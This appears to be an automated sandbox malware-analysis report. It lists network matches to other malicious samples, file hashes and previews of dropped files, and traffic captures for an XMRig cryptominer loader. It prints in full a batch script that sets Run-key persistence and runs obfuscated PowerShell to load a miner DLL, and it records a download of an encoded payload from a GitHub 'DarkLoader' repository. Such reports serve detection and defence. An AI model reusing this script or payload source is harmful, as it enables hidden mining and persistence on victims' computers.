	https://pub-7b8cca81dcf84958b8a0d1546cd93eb2.r2.dev/index.html	Get hash	malicious	Unknown	Browse	185.199.110.153
ATGS-MMD-ASUS	unLc6VekkL.elf	Get hash	malicious	Mirai	Browse	48.152.61.115
	17nDkQW4tK.elf	Get hash	malicious	Mirai	Browse	32.231.203.40
	2PQz3l61Pc.elf	Get hash	malicious	Mirai	Browse	57.224.245.58
	botx.mips.elf	Get hash	malicious	Mirai	Browse	57.49.219.81
	botx.x86.elf	Get hash	malicious	Mirai	Browse	50.15.245.80
	botx.mpsl.elf	Get hash	malicious	Mirai	Browse	48.92.6.162
	botx.arm.elf	Get hash	malicious	Mirai	Browse	51.212.97.68
	Hq2NRFbvRb.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	34.160.144.191
	https://ff-rewards-redeem-codes-org.github.io/Free-Fire-/	Get hash	malicious	HTMLPhisher	Browse	34.36.216.150
	http://mossandy0.wixsite.com/my-site	Get hash	malicious	Unknown	Browse	34.144.206.118
AMAZON-02US	unLc6VekkL.elf	Get hash	malicious	Mirai	Browse	35.160.185.9
	17nDkQW4tK.elf	Get hash	malicious	Mirai	Browse	54.183.174.200
	2PQz3l61Pc.elf	Get hash	malicious	Mirai	Browse	13.236.43.129
	botx.mips.elf	Get hash	malicious	Mirai	Browse	50.18.22.244
	botx.x86.elf	Get hash	malicious	Mirai	Browse	13.238.60.26
	botx.mpsl.elf	Get hash	malicious	Mirai	Browse	65.3.56.35
	https://hamilton.cmail20.com/t/r-e-tdtrkhul-niyflludj-b/	Get hash	malicious	Unknown	Browse	13.52.20.127
	Happy Holidays.docx	Get hash	malicious	Unknown	Browse	34.242.14.188
	https://forms.office.com/Pages/ResponsePage.aspx?id=mZB7T0Dtr0mx-Js9AsqUvjkKVGExcKpLpLje28x2_kZUOVA4UU9WT0pSQUFPSTZPUlhWTElINUNETy4u	Get hash	malicious	HTMLPhisher	Browse	18.245.86.69
	Narud#U017ebenica 08BIH2024.exe	Get hash	malicious	FormBook	Browse	54.67.42.145
CLOUDFLARENETUS	unLc6VekkL.elf	Get hash	malicious	Mirai	Browse	162.159.108.170
	XpADYjOsY5.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	188.114.96.3
	http://johnlevis.com	Get hash	malicious	Unknown	Browse	23.227.38.32
	sc7Qi5VdE1.exe	Get hash	malicious	Xmrig	Browse	162.159.128.233
	https://hamilton.cmail20.com/t/r-e-tdtrkhul-niyflludj-b/	Get hash	malicious	Unknown	Browse	104.21.62.23
	http://waitrosefurnituretsts.shop	Get hash	malicious	Unknown	Browse	172.67.137.109
	Factura 1-000087.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	http://waitrosefurnituretsts.shop	Get hash	malicious	Unknown	Browse	172.67.137.109
	receipt.ACH.No71124.html	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://forms.office.com/Pages/ResponsePage.aspx?id=mZB7T0Dtr0mx-Js9AsqUvjkKVGExcKpLpLje28x2_kZUOVA4UU9WT0pSQUFPSTZPUlhWTElINUNETy4u	Get hash	malicious	HTMLPhisher	Browse	1.1.1.1

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	Viz_Setup.U3.11.exe	Get hash	malicious	Unknown	Browse	185.199.110.133
	INV_35689.vbe	Get hash	malicious	AveMaria, UACMe	Browse	185.199.110.133
	PasteHook.exe	Get hash	malicious	AsyncRAT, DCRat, StormKitty, WorldWind Stealer, Xmrig	Browse	185.199.110.133
	Updater.lnk	Get hash	malicious	Unknown	Browse	185.199.110.133
	WireGaurd.exe	Get hash	malicious	Unknown	Browse	185.199.110.133
	66af531b832ee_main.exe	Get hash	malicious	Vidar	Browse	185.199.110.133
	66af4e35e761b_doz.exe	Get hash	malicious	Vidar	Browse	185.199.110.133
	SecuriteInfo.com.Trojan.Crypt.28917.30010.exe	Get hash	malicious	Unknown	Browse	185.199.110.133
	vercath63.b-cdn.ps1	Get hash	malicious	LummaC, Go Injector	Browse	185.199.110.133
	lUITPOq6Et.exe	Get hash	malicious	Unknown	Browse	185.199.110.133

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	3386
Entropy (8bit):	3.9792113994926126
Encrypted:	false
SSDEEP:	96:yj/QTtmhfRYNUjyISGvCX6suof1sohYHjQJwUETef6FLEUEeyEUEgOrMaq7gjN7Q:sEtmhpLjyISGvCX6suofhhYHjQJwUETM
MD5:	D1CEB3665CF8754AA9C6E254CBFC72F8
SHA1:	9EE386E54FF994AB602026E7437925017E21D3E0
SHA-256:	FF7215D41F8325EC79B252FEE2590E7BA2CBC79EA611527657CB396A148849AB
SHA-512:	12ADFD2F33A0FE6FFDE6C8991AC7BECA26DE135743154A167D76AE9196815DAA9FBDFFE992E7C82D2FC7DA31365F815E20B2B5E7312CE9426C14C75DB5374011
Malicious:	false
Preview:	{... "api": {... "id": null,... "worker-id": null... },... "http": {... "enabled": false,... "host": "127.0.0.1",... "port": 0,... "access-token": null,... "restricted": true... },... "autosave": true,... "background": false,... "colors": true,... "title": true,... "randomx": {... "init": -1,... "init-avx2": -1,... "mode": "auto",... "1gb-pages": false,... "rdmsr": true,... "wrmsr": true,... "cache_qos": false,... "numa": true,... "scratchpad_prefetch_mode": 1... },... "cpu": {... "enabled": true,... "huge-pages": true,... "huge-pages-jit": false,... "hw-aes": null,... "priority": null,... "memory-pool": false,... "yield": true,... "asm": true,... "argon2-impl": null,... "argon2": [0, 1, 2, 3],... "cn": [... [1, 0],... [1, 1],... [1, 2

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.0776520112277628
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryNak7YnqqRPN5Dlq5J:+RI+ycuZhN/akSRPNnqX
MD5:	79E64F4BEBD0922F76053E442F73BC79
SHA1:	E393AE56AB675746BE320211686AE90A02A04E5D
SHA-256:	CF49C1AAC70A6DCB928811BD35342AE0BEF3E67E56DF03181487BB2AFC80F859
SHA-512:	14DD9D6F49087C4BE4D1C3DED96CA1A6C86C828AE715DD20AE29EF064986213A3EEC9FAB619C550669CCF421194A0E0EA9719719FECBCF5BBB96E7683E52E8D7
Malicious:	false
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...w.e.i.z.m.r.e.n...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...w.e.i.z.m.r.e.n...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

Process:	C:\Windows\System32\wscript.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	204858
Entropy (8bit):	6.043017028771149
Encrypted:	false
SSDEEP:	6144:y4o7Q5eo2TELCUDhyQ1UOUyagWH1i1PU5kxYv:/gFoaE+pQXUZ1iZnxC
MD5:	8AA3DB9879D1F0025DCB32C18BD2135E
SHA1:	98D49D6A675177B0EA150303B3F3C619DA6FA77E
SHA-256:	BF37F4B4BA735F68B183411612CC4C36ED2E600558BA1CA53AF742A0A06E167F
SHA-512:	F38775F504290345F82AB2F0C372C903A0331D24065955C836CE8E4BCB1FB40E2F23441CA11AF8857E2953EAB0755C79E68A9CE08213299B7463AD9A9865AA4B
Malicious:	true
Preview:	TVNDRgAAAAD7RQIAAAAAACwAAAAAAAAAAwEBAAQAAAAyEgAAoQAAAAkAAQArAwAA..AAAAAAAA/1hQuyAAWENsaWVudC5iYXQAZAAAACsDAAAAAP9YYbsgAG1pbmVfc3Rh..cnQudmJzAADaAQCPAwAAAAD/WKi6IABmZXRjaFgzMi5kbGwAAGQCAI/dAQAAAP9Y..trogAGZldGNoWDY0LmRsbABU/mhBfkwAgENL7b19fFTVtTB8zsxJMoQJM+AEBo0y..QhAwoJFEJUzQJDBJoARnEpKQYgIISYcRIZJzAlhDEk9Gc7I9rc9Tube9j32qV221..j/fKvbWCVu0koUlQlA+9mgq1sUbd8aR1lDQZNHLetfY5kwT19vZ973/P7w2/OR/7..Y+2111p77bX2XvuQV7s9uMezp64uJXn7Ds/8hQ0HGsTau3bs3dlYu/D2u3burt07..PyV5b+33PNt27PAE79wu3d6wp07ct21vLeRu37sH327ft3P3jj37Gm7fLu3dW7tb..bKzd27Bzz+7b90q7Pdc3ejbdtXfn90oQlOd60QOwtjTc47n+2xtj1y0N4ra94nWN..dzTM91xf57llt7TLs/yWa25IScZ/K3ft2VOfktxQK3rqD+zasSq9cs/eO/3bxKBn..lef2+em1uxtXljG4axCuCXa+N33b3u3BnWLtdlHaWwtFWUF/6W2rfWVlt5VuyS9d..Xbx2o2/1xvJSn3dnnWfxpeWX1d7tWZRfsuam7EVLPN//u5qsqxW3BzfdlH3djl27..bp/f5Knd1VD7nwDev+Km/5dgs5abYL3pG2r31Rt1JupfV1pbv2vb9trFi25ftNSz..6PbbFy3xpjfs/N7ubWbnF21es2vX2rvq9+wVF8+fP3+RJ8MzASfDswiSlnp8u8W9..B/x7du4WV90+v1Taven2+UuqPfXSHbt2bvcAh0S41e4Xa/fu9kAZD5ZYvMS7yJu+..fs+2HWvWr4

Process:	C:\Windows\System32\certutil.exe
File Type:	Microsoft Cabinet archive data, many, 148987 bytes, 4 files, at 0x2c +A "XClient.bat" +A "mine_start.vbs", ID 4658, number 1, 9 datablocks, 0x1 compression
Category:	dropped
Size (bytes):	148987
Entropy (8bit):	7.996621162212626
Encrypted:	true
SSDEEP:	3072:KDLD3HwEGgsam1nGiREshhrh9P/9JBGEcFkLXv/P:o3HJ3zmhZEatX9XvX
MD5:	055B74449746D7227D6D39D8C492CDEA
SHA1:	76A6958C4F07C594B58CDA2874C8FD8C6A608220
SHA-256:	10E682FA3A4DC8ED4CCE1106558A391FA9E87B6D276819BED0C7313BFF8EF683
SHA-512:	BF43E8586C0EE026AF49F1EA322046A7CE389CCB8C96F47CAE08364523349A9D3309BB598FC4F0CB2FB952CAE242ACC93336DAAF1302D8FD7E580339F1DD9A67
Malicious:	true
Preview:	MSCF.....E......,...............2...........+..........XP. .XClient.bat.d...+......Xa. .mine_start.vbs............X.. .fetchX32.dll..d.........X.. .fetchX64.dll.T.hA~L..CK.}\|T.0\|..I2..3....2B.0..D%L.$0I..g...b..I..!.s.XC.OFs.=..S....}.Wm......V.$.IP.......F..u.4.4r..9.....}......9..c..Z{..^..W.=.....%y..........v...X....v..;?%yo..<.v.........N.mo-.n...n.s..=..n....[.[l...s....J.=.7z6.w..J...z....4.....c.-...u.w4..\_.e.....knHI..+w..S...P+z.....r..;...g......W.1.k...v.7}.....b.vQ.[.EYA..m.}ee..n./]].v.o...R.wg.g.....Y._...EK<.........7.}.].n.....P.......`...`...j...u&._WZ[.k....n_......-.7....mf..m^.k........?..'.3.'....z\|....{v..W.>.T....K.=....vn...D....k...@...X....~..k..f.w.X..@=.....;j.....{.........,2.-2........m....{...+W.M.....e.....{....}.5{k.j.5.5.jvy..l.,DqY...pJYx...{.]{.o.... z....9U.G..A.+.f...*.......,.wg.x.........G....R...x...[.......~.g.J...V...C.;...,.,..C...8.~..qG9./..;.x..1....s.^..(....7.w6x......mwy

Process:	C:\Windows\System32\expand.exe
File Type:	DOS batch file, ASCII text, with very long lines (521), with CRLF line terminators
Category:	dropped
Size (bytes):	811
Entropy (8bit):	5.498605131509978
Encrypted:	false
SSDEEP:	24:eG5VwFnPDG3lkPM2p8S7BC/DcM2D1N/FcM29Hmfn1XSGX3RE6Kxl2JTbG8z:f5VYqqE2pT7BC/R2D1N/j29HmfoEq6DX
MD5:	B9565265E5E1996772CE5B0E0D9075B7
SHA1:	D3C164055A0E1E1CEBF17906776342B8ABB6A26D
SHA-256:	EA973996816D068E19D69DA018080C4B92D5777526AE8123ADD41133465C993D
SHA-512:	0BEB70E58AC98AF9F16455E5CE2C294BF0DBAAA476DD5991CBB426EEBAF0182DCD54E7AD0BA7934623E280957E2EEEA598EA349ED19917596D221E43674E60EE
Malicious:	false
Preview:	@echo off..cd "%systemdrive%\miner"..reg add hkcu\software\microsoft\windows\currentversion\run /v XmrigMiner /t reg_sz /d "%systemdrive%\miner\mine_start.vbs" /f >nul 2>&1......:loop..set pyld=$WorkPath = \"$env:SystemDrive\miner\";$architecture = $env:PROCESSOR_ARCHITECTURE;if ($architecture -eq 'AMD64') {$WorkPath = \"$env:SystemDrive\miner\fetchX64.dll\"} elseif ($architecture -eq 'x86') {$WorkPath = \"$env:SystemDrive\miner\fetchX32.dll\"};$Newpath = $WorkPath.Replace('\', '\\');$signature = '[DllImport("""' + $Newpath + '""", EntryPoint=\"RunX\")] public static extern int RunX();';$LoadDLL = Add-Type -MemberDefinition $signature -Name 'LoadDLL' -Namespace 'LoadDLL' -PassThru;$LoadDLL::RunX()..set run_command=P^o^we^r^s^h^e^l^l -^c %pyld%..%run_command%..ping localhost -n 60 >nul 2>&1..goto loop

Process:	C:\Windows\System32\PING.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1852
Entropy (8bit):	4.229491289826708
Encrypted:	false
SSDEEP:	12:PLRl5pTcgTcgTcgTcgTcgTcgTcgTcgTcgTcgTcgTcgTcgTcgTcgTcgTcgTcgTcgq:RFUEAokItULVDv
MD5:	4E7E42430259EA77A04A9146CC99BA05
SHA1:	199F7B02C8F4BE52968D58FD868725A4718FED8A
SHA-256:	5DF6C802E75D958E341B216A94E010300E9C8417B316F3DE242D23BAC62A4608
SHA-512:	4134EB2C01F899E972E34773D81AABF55307AD91CF16BEBD2EE389F086377074440B440CA36B5B9A215AFC32AD8887FC7A36362622D26517C97A43E4ADC0C65F
Malicious:	false
Preview:	..Pinging 216041 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply fr

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 5, 2024 11:57:26.780042887 CEST	62697	53	192.168.2.4	1.1.1.1
Aug 5, 2024 11:57:26.787893057 CEST	53	62697	1.1.1.1	192.168.2.4
Aug 5, 2024 11:57:27.479167938 CEST	58294	53	192.168.2.4	1.1.1.1
Aug 5, 2024 11:57:27.486248016 CEST	53	58294	1.1.1.1	192.168.2.4
Aug 5, 2024 11:57:49.979768991 CEST	61381	53	192.168.2.4	1.1.1.1
Aug 5, 2024 11:57:49.990093946 CEST	53	61381	1.1.1.1	192.168.2.4
Aug 5, 2024 11:57:52.734699011 CEST	62147	53	192.168.2.4	1.1.1.1
Aug 5, 2024 11:57:52.946862936 CEST	53	62147	1.1.1.1	192.168.2.4
Aug 5, 2024 11:58:15.494272947 CEST	57838	53	192.168.2.4	1.1.1.1
Aug 5, 2024 11:58:15.504991055 CEST	53	57838	1.1.1.1	192.168.2.4
Aug 5, 2024 11:58:34.641505003 CEST	59854	53	192.168.2.4	1.1.1.1
Aug 5, 2024 11:58:34.649477005 CEST	53	59854	1.1.1.1	192.168.2.4
Aug 5, 2024 11:59:20.643898010 CEST	62798	53	192.168.2.4	1.1.1.1
Aug 5, 2024 11:59:20.654925108 CEST	53	62798	1.1.1.1	192.168.2.4

Timestamp	Bytes transferred	Direction	Data
Aug 5, 2024 11:57:26.803554058 CEST	67	OUT	GET / HTTP/1.1 User-Agent: InternetCheck Host: www.google.com
Aug 5, 2024 11:57:27.473689079 CEST	1236	IN	HTTP/1.1 200 OK Date: Mon, 05 Aug 2024 09:57:27 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=ISO-8859-1 Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-QTzAEYKY8wlUZjrdeceo5g' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Set-Cookie: AEC=AVYB7coWU9bkPLj53wVs5Hex20mtXhIBuWctI6FQMeF4ni3BDbIJqHrwdg; expires=Sat, 01-Feb-2025 09:57:27 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax Set-Cookie: NID=516=MKTdEa8n98jfdeZzyXwTVXO_YgnBAkCU9Kff8BxvKaHpsJouNzUxhgrYAU3gTnGC6-fIuCRRoCtS8xyMa_2l9i7r5PzoXj60nb05V1EafGjkv9z7mFZ0t3Cwgi5SARc8BiSluFvzG9HQO5kIJ620b2oyxFoyuXDJrf4tpGAnpWnaBxS1RwFrHuWe; expires=Tue, 04-Feb-2025 09:57:27 GMT; path=/; domain=.google.com; HttpOnly Accept-Ranges: none Vary: Accept-Encoding Transfer-Encoding: chunked Data Raw: 33 31 62 65 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 69 74 65 6d 73 63 6f 70 65 3d 22 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 53 65 61 72 63 68 20 74 68 65 20 77 6f 72 6c 64 27 73 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2c 20 69 6e 63 6c 75 64 69 6e 67 20 77 65 62 70 61 67 65 73 2c 20 69 6d 61 67 65 73 2c 20 76 69 64 65 6f 73 20 61 6e 64 20 6d Data Ascii: 31be<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta content="Search the world's information, including webpages, images, videos and m
Aug 5, 2024 11:57:27.473706961 CEST	1236	IN	Data Raw: 6f 72 65 2e 20 47 6f 6f 67 6c 65 20 68 61 73 20 6d 61 6e 79 20 73 70 65 63 69 61 6c 20 66 65 61 74 75 72 65 73 20 74 6f 20 68 65 6c 70 20 79 6f 75 20 66 69 6e 64 20 65 78 61 63 74 6c 79 20 77 68 61 74 20 79 6f 75 27 72 65 20 6c 6f 6f 6b 69 6e 67 Data Ascii: ore. Google has many special features to help you find exactly what you're looking for." name="description"><meta content="noodp, " name="robots"><meta content="text/html; charset=UTF-8" http-equiv="Content-Type"><meta content="/images/brandin
Aug 5, 2024 11:57:27.473716021 CEST	1236	IN	Data Raw: 33 36 37 2c 33 2c 31 39 34 2c 33 34 38 2c 35 37 30 2c 37 39 39 2c 31 38 31 2c 35 32 39 2c 31 38 35 38 2c 32 2c 39 30 36 2c 31 2c 31 39 36 30 2c 32 30 33 36 2c 39 32 2c 32 38 36 31 2c 32 31 2c 32 37 30 35 2c 34 31 36 35 2c 31 37 32 36 2c 32 33 38 Data Ascii: 367,3,194,348,570,799,181,529,1858,2,906,1,1960,2036,92,2861,21,2705,4165,1726,2380,1484,848,1962,127,13,559,98,2234,365,1,38,396,2041,1890,5,976,1285,2,1343,748,712,58,442,621,166,30,246,724,1,1427,387,732,1728,4709,3,204,1917,279,121,341,39,
Aug 5, 2024 11:57:27.473727942 CEST	1236	IN	Data Raw: 74 74 70 73 3a 22 26 26 28 67 6f 6f 67 6c 65 2e 6d 6c 26 26 67 6f 6f 67 6c 65 2e 6d 6c 28 45 72 72 6f 72 28 22 61 22 29 2c 21 31 2c 7b 73 72 63 3a 61 2c 67 6c 6d 6d 3a 31 7d 29 2c 61 3d 22 22 29 3b 72 65 74 75 72 6e 20 61 7d 0a 66 75 6e 63 74 69 Data Ascii: ttps:"&&(google.ml&&google.ml(Error("a"),!1,{src:a,glmm:1}),a="");return a}function t(a,b,c,d,k){var e="";b.search("&ei=")===-1&&(e="&ei="+p(d),b.search("&lei=")===-1&&(d=q(d))&&(e+="&lei="+d));d="";var g=b.search("&cshid=")===-1&&a!=="slh",f
Aug 5, 2024 11:57:27.473737955 CEST	1236	IN	Data Raw: 76 61 72 20 68 3b 28 68 3d 67 6f 6f 67 6c 65 29 2e 6c 6f 61 64 41 6c 6c 7c 7c 28 68 2e 6c 6f 61 64 41 6c 6c 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 67 6f 6f 67 6c 65 2e 6c 71 2e 70 75 73 68 28 5b 61 2c 62 5d 29 7d 29 3b 67 6f 6f 67 6c 65 2e Data Ascii: var h;(h=google).loadAll\|\|(h.loadAll=function(a,b){google.lq.push([a,b])});google.bx=!1;var k;(k=google).lx\|\|(k.lx=function(){});var l=[],m;(m=google).fce\|\|(m.fce=function(a,b,c,n){l.push([a,b,c,n])});google.qce=l;}).call(this);google.f={};(fu
Aug 5, 2024 11:57:27.473748922 CEST	1236	IN	Data Raw: 2c 61 2c 70 2c 2e 68 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 6f 76 65 72 66 6c 6f 77 2d 79 3a 73 63 72 6f 6c 6c 7d 23 67 6f 67 7b 70 61 64 64 69 6e 67 3a Data Ascii: ,a,p,.h{font-family:arial,sans-serif}body{margin:0;overflow-y:scroll}#gog{padding:3px 8px 0}td{line-height:.8em}.gac_m td{line-height:17px}form{margin-bottom:20px}.h{color:#1967d2}em{font-weight:bold;font-style:normal}.lst{height:25px;width:49
Aug 5, 2024 11:57:27.473761082 CEST	1236	IN	Data Raw: 3d 30 2c 72 2c 74 3d 67 6f 6f 67 6c 65 2e 65 72 64 2c 76 3d 74 2e 6a 73 72 3b 67 6f 6f 67 6c 65 2e 6d 6c 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 64 2c 6d 2c 65 29 7b 65 3d 65 3d 3d 3d 76 6f 69 64 20 30 3f 32 3a 65 3b 62 26 26 28 72 3d 61 26 26 Data Ascii: =0,r,t=google.erd,v=t.jsr;google.ml=function(a,b,d,m,e){e=e===void 0?2:e;b&&(r=a&&a.message);d===void 0&&(d={});d.cad="ple_"+google.ple+".aple_"+google.aple;if(google.dl)return google.dl(a,e,d,!0),null;b=d;if(v<0){window.console&&console.error
Aug 5, 2024 11:57:27.473815918 CEST	1236	IN	Data Raw: 3d 62 29 2c 67 6f 6f 67 6c 65 2e 6d 6c 28 61 2c 21 31 2c 76 6f 69 64 20 30 2c 21 31 2c 61 2e 6e 61 6d 65 3d 3d 3d 22 53 79 6e 74 61 78 45 72 72 6f 72 22 7c 7c 61 2e 6d 65 73 73 61 67 65 2e 73 75 62 73 74 72 69 6e 67 28 30 2c 31 31 29 3d 3d 3d 22 Data Ascii: =b),google.ml(a,!1,void 0,!1,a.name==="SyntaxError"\|\|a.message.substring(0,11)==="SyntaxError"\|\|a.message.indexOf("Script error")!==-1?3:0));r=null;p&&q>=l&&(window.onerror=null)};})();</script></head><body bgcolor="#fff"><script nonce="QTzAEY
Aug 5, 2024 11:57:27.473829985 CEST	1236	IN	Data Raw: 69 3e 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 69 64 3d 67 62 66 20 63 6c 61 73 73 3d 67 62 66 3e 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 69 64 3d 67 62 65 3e 3c 2f 73 70 61 6e 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: i></span><span id=gbf class=gbf></span><span id=gbe></span><a href="http://www.google.com/history/optout?hl=en" class=gb4>Web History</a> \| <a href="/preferences?hl=en" class=gb4>Settings</a> \| <a target=_top id=gb_70 href="https://accounts.g
Aug 5, 2024 11:57:27.473844051 CEST	1236	IN	Data Raw: 3e 3c 2f 64 69 76 3e 3c 62 72 20 73 74 79 6c 65 3d 22 6c 69 6e 65 2d 68 65 69 67 68 74 3a 30 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 64 73 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6c 73 62 62 22 3e 3c 69 6e 70 75 74 20 63 6c 61 73 73 3d Data Ascii: ></div><br style="line-height:0"><span class="ds"><span class="lsbb"><input class="lsb" value="Google Search" name="btnG" type="submit"></span></span><span class="ds"><span class="lsbb"><input class="lsb" id="tsuid_1" value="I'm Feeling Lucky"
Aug 5, 2024 11:57:27.478683949 CEST	1236	IN	Data Raw: 75 2c 67 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 67 62 76 22 29 3b 67 26 26 28 67 2e 76 61 6c 75 65 3d 61 29 3b 66 26 26 77 69 6e 64 6f 77 2e 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b Data Ascii: u,g=document.getElementById("gbv");g&&(g.value=a);f&&window.setTimeout(function(){location.href=f},0)};}).call(this);</script></form><div style="font-size:83%;min-height:3.5em"><br></div><span id="footer"><div style="font-size:10pt"><div style

Timestamp	Bytes transferred	Direction	Data
2024-08-05 09:57:28 UTC	169	OUT	GET /DevilBot000/DarkLoader/main/q64New.encode HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 7; Win64; x64) Host: raw.githubusercontent.com Cache-Control: no-cache
2024-08-05 09:57:28 UTC	905	IN	HTTP/1.1 200 OK Connection: close Content-Length: 16409600 Cache-Control: max-age=300 Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox Content-Type: application/octet-stream ETag: "48d9861c72adecec7ff21a8c777f4ff2622e362af104a262b26ecc8d3a714868" Strict-Transport-Security: max-age=31536000 X-Content-Type-Options: nosniff X-Frame-Options: deny X-XSS-Protection: 1; mode=block X-GitHub-Request-Id: DB9B:76A0E:144ECA9:16CB574:66B0A207 Accept-Ranges: bytes Date: Mon, 05 Aug 2024 09:57:28 GMT Via: 1.1 varnish X-Served-By: cache-nyc-kteb1890033-NYC X-Cache: MISS X-Cache-Hits: 0 X-Timer: S1722851848.071019,VS0,VE157 Vary: Authorization,Accept-Encoding,Origin Access-Control-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin X-Fastly-Request-ID: 54016a9a0534c08990bf9372d9241e84355add48 Expires: Mon, 05 Aug 2024 10:02:28 GMT Source-Age: 0
2024-08-05 09:57:28 UTC	1378	IN	Data Raw: 1f 1d d6 79 62 30 56 32 65 57 77 39 b2 95 41 79 f6 41 3d 3d 52 47 46 79 21 30 56 32 61 57 77 39 4d 6a 41 79 4e 41 3d 3d 52 47 46 79 61 30 56 32 61 57 77 39 4d 6a 41 79 4e 41 3d 3d 42 46 46 79 6f 2f ec 3c 61 e3 7e f4 6c d2 40 35 83 60 69 55 3b 34 66 09 13 5f 31 40 00 3a 57 5a 2c 04 2f 16 3a 61 5f 58 72 35 33 17 41 59 38 12 25 18 24 19 20 05 25 1c 60 4c 30 37 76 47 46 79 61 30 56 32 1f 43 3f 3e 77 1f 67 2d 74 34 1b 69 68 32 60 2d 10 3d 73 67 51 22 51 6d 3c 67 62 2c ec 34 1b 69 23 4a 64 2c 51 45 70 66 5b 22 51 6d 76 1f 67 2d 3f 4c 1a 68 6b 32 60 2d 5b 45 71 66 3e 22 51 6d 71 9e 62 2c 55 34 1b 69 6e b3 64 2c 54 45 70 66 5d a3 52 6c 66 1f 67 2d 1b b5 1f 68 6c 32 60 2d 34 c4 70 67 5a 22 51 6d 18 9e 65 2c 75 34 1b 69 00 2e 25 11 5b 45 70 66 61 57 77 39 4d 6a 41 Data Ascii: yb0V2eWw9AyA==RGFy!0V2aWw9MjAyNA==RGFya0V2aWw9MjAyNA==BFFyo/<a~l@5`iU;4f_1@:WZ,/:a_Xr53AY8%$ %`L07vGFya0V2C?>wg-t4ih2`-=sgQ"Qm<gb,4i#Jd,QEpf["Qmvg-?Lhk2`-[Eqf>"Qmqb,U4ind,TEpf]Rlfg-hl2`-4pgZ"Qme,u4i.%[EpfaWw9MjA
